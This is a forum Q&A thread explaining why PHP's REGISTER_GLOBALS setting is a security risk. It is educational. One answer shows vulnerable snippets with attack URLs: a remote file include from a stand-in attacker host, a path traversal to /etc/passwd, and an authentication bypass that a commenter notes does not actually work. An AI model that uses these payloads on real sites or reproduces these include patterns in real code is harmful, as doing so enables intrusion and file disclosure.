I'm not a PHP developer but i've seen in a couple of places that people seem to treat it like the plague or something. Why?
+1
A:
Because it allows the user to inject any global variable in your code without any control.
Based on the quality of the code, it may introduce major security bugs.
Vincent Robert
2009-09-13 10:24:00
+6
A:
REGISTER_GLOBALS means that all variables passed through GET or POST are avilable as global variables in your script. Since accessing undeclared variables is not an error in PHP (it's a warning), it can lead to very nasty situations. Consider this, for example:
<?php
// $debug = true;
if ($debug) {
echo "query: $query\n";
}
It is not a bad thing per se (well engineered code should not generate warnings, therefore should not access any variables that might be undeclared (and should not need REGISTER_GLOBALS for the same reason)), but PHP code is usually [very] low quality, leading to this kind of security holes.
soulmerge
2009-09-13 10:24:38
"PHP code is usually [very] low quality" - speak for yourself
OIS
2009-09-13 14:45:32
Usually != always. But I would recommend you to browse the source of some open-source CMS's. You'll find more `eval()`, `erege_replace()` and `REGISTER_GLOBALS` than you might expect. Note: I'm a php developer myself.
soulmerge
2009-09-13 14:58:08
Trying to read undefined variables is nasty. You wouldn’t have that problem with `$debug = false;`.
Gumbo
2009-09-21 22:19:07
+2
A:
Enabling REGISTER_GLOBALS exposes webpages served by PHP to vulnerabilities which some bad guys will be keen to exploit.
With it enabled, any query string at the end of the URL:
http://yourdomain/something.php?valid=true
will affect the value of a variable $valid (for example) in something.php, if it exists.
If you're using publically available PHP code (a library for example) the names of variables are well known, and it would be possible for hackers to control their values by assigning values in the query string. They may be able to bypass authentication.
Even if you're not using public code, it may be possible to guess the names of important variables, and control their values.
It used to be the default to have REGISTER_GLOBALS enabled in PHP.INI
Recent practice has been to disable it by default. Enable it at your own risk!
pavium
2009-09-13 10:40:15
+2
A:
Just to add, here are some situations where having REGISTER_GLOBALS enabled could ruin your day:
Using the query string to bypass access control (hack using http://example.com/?logged=1):
<?php
$logged = User::getLogged();
if ($logged)
{
include '/important/secret.php';
}
?>
Remote File Inclusion (RFI):
<?php
//http://example.com/?path=http://evilbadthings.example.com/
include "$path";
?>
Local File Inclusion (LFI):
<?php
//http://example.com/?path=../../../../etc/passwd
include "$path";
?>
karim79
2009-09-13 10:47:20
Your first example is not compromised since the value of `$logged` is defined by the return value of `User::getLogged`.
Gumbo
2009-09-21 22:32:11